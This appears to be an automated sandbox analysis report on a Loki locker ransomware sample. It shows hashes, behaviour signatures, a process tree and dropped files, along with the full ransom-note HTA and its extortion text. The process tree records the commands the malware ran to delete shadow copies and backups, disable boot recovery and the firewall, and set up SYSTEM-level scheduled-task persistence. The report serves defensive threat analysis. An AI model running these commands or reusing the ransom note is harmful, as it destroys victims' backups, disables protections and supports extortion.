Analysis

  • max time kernel: 150s
  • max time network: 153s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 18-10-2024 02:56

General

  • Target: e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
  • Size: 499KB
  • MD5: d7d28006e0679b1f2ea0a87ba94f4af0
  • SHA1: 675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee
  • SHA256: e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3
  • SHA512: b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a
  • SSDEEP: 12288:dSGy1fPQ+biwPPMgasqdprlTT6zncVUJ7vn:kGy1fP9PPIrTT6DN

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,9,25,2,57,30).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. 
The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">58344A94</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. 
just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

[email protected]

[email protected]

Signatures

  • Modifies Windows Defender Real-time Protection settings (3 TTPs, 4 IoCs)
  • Deletes shadow copies (3 TTPs)

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall (2 TTPs, 2 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file (3 IoCs)
  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • Drops desktop.ini file(s) (28 IoCs)
  • Enumerates connected drives (3 TTPs, 1 IoC)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (64 IoCs)
  • Drops file in Windows directory (2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 6 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash (4 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 21 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel (2 IoCs)
  • Modifies registry class (8 IoCs)
  • Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (47 IoCs)
  • Suspicious use of WriteProcessMemory (60 IoCs)
  • System policy modification (1 TTP, 2 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
    "C:\Users\Admin\AppData\Local\Temp\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5476
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:376
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.cmdline"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES319A.tmp" "c:\ProgramData\CSC3EFA743BADC04205A98E14F5CAC9A499.TMP"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5648
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6016
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6008
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:6076
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:5696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6120
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5828
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4472
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5824
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:5340
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:5452
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1428
        3⤵
        • Program crash
        PID:5456
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4784
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1744
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1436
        3⤵
        • Program crash
        PID:2260
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:116
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 116 -s 1336
        3⤵
        • Program crash
        PID:6124
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3396
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 1368
        3⤵
        • Program crash
        PID:5368
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2336
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3396 -ip 3396
    1⤵
    PID:6128
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4784 -ip 4784
    1⤵
    PID:5400
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 116 -ip 116
    1⤵
    PID:6120
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1744 -ip 1744
    1⤵
    PID:5772
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5452 -ip 5452
    1⤵
    PID:3624

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\5ha2hibk.exe
    Filesize: 32KB
    MD5: 134f012757195ef52eb253201be7ff38
    SHA1: 12fb8b3f0cd1638f9f06e67fcc062e76fd4286d9
    SHA256: 570e693a8625978a46c7970009f328b395782089c0401f49e1482da07303f76b
    SHA512: edb002183f061cf4ddb5d4a696b74908fa66b7e56233901d1a1d10f57f427044f3e84a5950ee2dc0f16f4ce6fbc33720d55484df5e47a52ba88f280fc5db3257

  • C:\ProgramData\winlogon.exe
    Filesize: 499KB
    MD5: d7d28006e0679b1f2ea0a87ba94f4af0
    SHA1: 675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee
    SHA256: e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3
    SHA512: b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a

  • C:\Users\Admin\AppData\Local\Temp\RES319A.tmp
    Filesize: 29KB
    MD5: 52e12418bf2ae2d7d69d77c5953b9e78
    SHA1: 2b344064a73780c794f950e2bec48ad315edf896
    SHA256: 302d108b502dd6255061c0822bae01eb230f52c8274c30a8f71d033333525112
    SHA512: 6adb8ff2f81f25ccc12ce6c68310f4c66f26cdd3a729239448d353ded7a455561bec28e625f6d47006df5aaf9301f7179175b1561d8bbfc42a402488536de9a7

  • C:\Users\Admin\AppData\Local\Temp\info.hta
    Filesize: 3KB
    MD5: 80bb4c4a3a988d7eab8240e85e07401f
    SHA1: 9424a3587e8b77866fd5dc598715a8569a0aedac
    SHA256: f0922c59720b8590b821573435e08523734c3c17258adc280ed7b33bbcb75c7b
    SHA512: 6aab15dc2f69cefb6c23b6e123cce02cb22ccac79e94729f2c828a4ace56cf9c94878869c95ad6ab80cf3dd31f834c53f2230118a27ab035ab917c832e655f71

  • C:\Users\Admin\Desktop\Cpriv.Loki
    Filesize: 2KB
    MD5: d4091fcabf754815f654ea52de30231b
    SHA1: 0e844be856f3a6b82dbe7e05d4c2dfb340631c4b
    SHA256: cc14b935ce8724fe2f01933e8727e813bd54cf70f1f0c845b9ec413901c91dd9
    SHA512: cd4f4983161818b6cfd30e5ce488bfdf86f6c411698c93bae35623362093767eca96b432a16fe2ad100978ee6bc86c6a564e8cbd3d331a5e425622ba4398ba04

  • C:\Users\Admin\Documents\Restore-My-Files.txt
    Filesize: 344B
    MD5: 4619f9eed707de724ceb97b506d7b6fe
    SHA1: 6868619ecca7303fcbc9a3d440dddb7f50775e0a
    SHA256: 00e261865614395f37891df8baaf63c09bf2c67b99bbb7951f633824c95b0e52
    SHA512: 5a63a7e0393127414806a83a695e1d63bf97c376e2c43e410b46e4acca5ee1ea0bbcd30ac45e2f517550c9c20ed43d11960b41beae90bb4b3665548af6728b50

  • \??\c:\ProgramData\CSC3EFA743BADC04205A98E14F5CAC9A499.TMP
    Filesize: 28KB
    MD5: ef314b2832f08be28a768647b672f4ff
    SHA1: a43b602f1453f25da6c5267e2becd098836a48ad
    SHA256: a4803bed4ac93466c2f3fa08cd166869da1d2585bb3a927f2c7a43ac94675cae
    SHA512: 4781ab5643834af818785950ff876d44f3be03d08312a2792fdb939257c341925a7ce2024a45eb374b41798cd1fea318f93a6105f1672fcb9778163c221a6c75

  • \??\c:\Users\Admin\AppData\Local\Temp\rv3yc3xz.ico
    Filesize: 27KB
    MD5: dbc49b5f7714255217080c2e81f05a99
    SHA1: 4de2ef415d66d2bb8b389ba140a468b125388e19
    SHA256: 6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c
    SHA512: 29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

  • \??\c:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.0.cs
    Filesize: 1KB
    MD5: c613631bdd33f586082cd9fa5c31a399
    SHA1: f629d338ddcb32039b87831e640f07ca443a2d31
    SHA256: 8e19800612f096b7f53f5aa023babe7aeee3a8aaf6f7421063ed245ebea1a70a
    SHA512: 1ac9a6b54fe6360cab5514ea5f9084c78cf0235a31f26705e3829b95554651c2718ea2eaeacbc2f5a77671fa587955cb1ec6d4c5016096c1a72be29bacc13de8

  • \??\c:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.cmdline
    Filesize: 236B
    MD5: 84e055377be82abb58026b55e1f4bfb7
    SHA1: bf54ea5e74d23763c019f956f4246768c5ca0184
    SHA256: 685e6f3f8d58bf68824739dedd8bc000688c25b6a96e9019be72f5867550e7b3
    SHA512: 0f557598ce20bd5982ba2ce3e366c992651a6bcc2da99dd84d49b293df1a9bbf273cd0e5fcf19868abe7c5166b237e29113a1ea27cb51c556a68b4ed5a202e97

  • memory/2128-4-0x0000000005770000-0x00000000057E6000-memory.dmp
    Filesize: 472KB

  • memory/2128-8-0x0000000074A00000-0x00000000751B0000-memory.dmp
    Filesize: 7.7MB

  • memory/2128-7-0x0000000074A0E000-0x0000000074A0F000-memory.dmp
    Filesize: 4KB

  • memory/2128-6-0x0000000074A00000-0x00000000751B0000-memory.dmp
    Filesize: 7.7MB

  • memory/2128-5-0x0000000005500000-0x0000000005522000-memory.dmp
    Filesize: 136KB

  • memory/2128-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp
    Filesize: 4KB

  • memory/2128-3-0x00000000055F0000-0x0000000005656000-memory.dmp
    Filesize: 408KB

  • memory/2128-2-0x0000000005550000-0x00000000055E2000-memory.dmp
    Filesize: 584KB

  • memory/2128-1-0x0000000000B30000-0x0000000000BB8000-memory.dmp
    Filesize: 544KB